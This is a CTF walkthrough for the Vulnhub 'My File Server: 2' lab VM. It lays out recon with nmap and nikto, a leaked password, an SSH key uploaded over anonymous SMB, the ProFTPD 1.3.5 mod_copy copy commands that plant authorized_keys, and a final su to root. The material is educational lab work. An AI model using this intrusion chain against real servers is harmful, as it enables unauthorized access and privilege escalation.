My File Server: 2 Walkthrough Vulnhub | My File Server: 2 Vulnhub Writeup
In this Articles we are solving another Vulnhub CTF My File Server: 2 is created by Akanksha Sachin Verma you can download here this VM
This boot2root machine is the Second Challenge of “My File Server” series. This is a realistic File Server with some intresting loop holes. As its name, you will get many File Sharing Services and their privileges to play.
we always start with netdiscover to get the IP of the VM machine
Let’s proceed further with Nmap to scan our target IP to find open ports and services.
nmap -sV 192.168.43.95
Nmap out is shown our target many port are open different running services We saw FTP’s anonymous login enabled and port 445 was also available for SMB.
We also explore the IP host in the web browser as port 80 has been opened for the HTTP service.
I chose to run nikto for HTTP weak config listing, and luckily found an entry for readme.txt and open the file using curl command
nikto --url http://192.168.43.95
after ran the curl command we shown output is gave me an password rootroot1 but
I log in the ssh account but we see publicly permission denies error Now time to generate some ssh keys, thus we used ssh-keygen to generate ssh public keys without password in our local machine.
ssh [email protected] ssh-keygen -b 2048
After generating the ssh public key we need to upload the key target machine
smbclient -L 192.168.43.95
I log in the anonymous user smb server and upload the file smbdata drive as a authorized_keys using the following command
smbclient //192.168.43.95/smbdata cd samba/ put /root/.ssh/id_rsa.pub authorized_keys
We already see nmap output target our target port 2121 is open running proftpd 1.3.5 service I found the mod_copy exploit
searchsploit proftpd 1.3.5
I connect the port 2121 and copy our public ssh key smbdata to smbuser .ssh directory as an authorized_keys
nc -vv 192.168.43.95 2121 site cpfr /smbdata/samba/authorized_keys site cpto /home/smbuser/.ssh/authorized_keys
Then I again tried to connect with SSH without password and we successful login with smbuser
ssh [email protected]192.168.43.95
I upgrade the shell using the rootroot1 password we already found the password apache server readme.txt file
id su root
and finally we found our last flag
id cd /root ls cat proof.txt